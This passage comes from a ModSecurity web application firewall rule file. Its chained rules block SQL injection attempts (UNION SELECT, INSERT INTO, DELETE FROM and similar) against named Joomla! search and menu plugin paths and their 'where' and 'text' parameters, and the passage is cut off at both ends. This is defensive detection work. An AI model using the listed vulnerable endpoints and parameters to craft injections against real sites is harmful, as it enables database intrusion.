WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005414) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php SELECT SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005414,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UNION SELECT SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005415,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005416) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php INSERT SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005416,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php DELETE SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005417,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php ASCII SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005418,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005419) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005419,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where SELECT SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005420,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UNION SELECT SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005421,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005422) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where INSERT SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005422,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where DELETE SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005423,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005424) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where ASCII SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005424,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005425,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where SELECT SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005426,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UNION SELECT SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005427,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where INSERT SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005428,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where DELETE SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005429,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where ASCII SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005430,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005431,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text SELECT SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005432,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UNION SELECT SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005433,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005434) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text INSERT SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005434,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005435) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text DELETE SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005435,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text ASCII SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005436,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005437,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005438) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text SELECT SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005438,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005439) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UNION SELECT SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005439,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005440) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text INSERT SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005440,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005441) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text DELETE SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005441,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005442) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text ASCII SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005442,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005443) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005443,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005444) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text SELECT SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005444,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005445) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UNION SELECT SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005445,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UNION 